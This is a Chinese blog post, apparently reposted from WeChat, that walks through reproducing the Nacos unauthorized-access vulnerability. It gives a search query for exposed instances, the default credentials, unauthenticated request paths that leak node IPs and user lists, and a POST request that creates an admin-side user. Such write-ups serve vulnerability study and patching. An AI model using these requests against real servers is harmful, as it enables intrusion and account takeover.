Nacos 未授权访问漏洞

admin 2021年4月17日15:30:50评论7 views字数 1132阅读3分46秒阅读模式

 

一漏洞背景

今天听群里问Nacos 未授权访问漏洞。是个老洞了,不过还是可以做一下笔记的

2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。

受影响版本Nacos <= 2.0.0-ALPHA.1

二、漏洞复现

title="Nacos"

我们也可以自己搭建

https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1

wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz./startup.sh -m standalone

然后访问 http://ip:端口/nacos 即可,默认账号密码 nacos/nacos

 

随意请求一个地方试试,测试下是否有未授权也可以访问

Nacos 未授权访问漏洞

我们直接简化下 并退出后台试试前端访问下试试

 

http://xxx.xxx.xxx.xxx/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=

Nacos 未授权访问漏洞

可以发现以及泄露了 ip节点 等数据 (证实是确实存在的)

 

我们试下访问用户列表

为什么是 /v1/auth/users ,而不是 /nacos/v1/auth/users

因为大部分企业都是 /v1/auth/users 这也就是为什么好多人没有复现成功的原因所在

 

v1/auth/users?pageNo=1&pageSize=9

 

可以看能够前端未授权访问用户列表

还可以发现对用户的请求是没有过滤的,完全可以通过未授权的情况获取用户的敏感信息

 

Nacos 未授权访问漏洞

那么我们直接简化请求下尝试创建一个用户

POST /v1/auth/users?username=ttt&password=ttt

 

Nacos 未授权访问漏洞

再次验证一下是否成功。okk

Nacos 未授权访问漏洞

HW期间 暂时不提供相关脚本相信大家也理解 毕竟不是什么新的洞 做个小笔记。各路大神见笑了  欢迎大家可以加入群聊。为大家提供讨论的地方。此群只支持七天 。欢迎各位师傅加入。一起讨论和学习

Nacos 未授权访问漏洞

特别声明:

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。

作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 切勿用于非法,仅供学习参考

原文始发于微信公众号(深夜笔记本):Nacos 未授权访问漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月17日15:30:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Nacos 未授权访问漏洞http://cn-sec.com/archives/759431.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息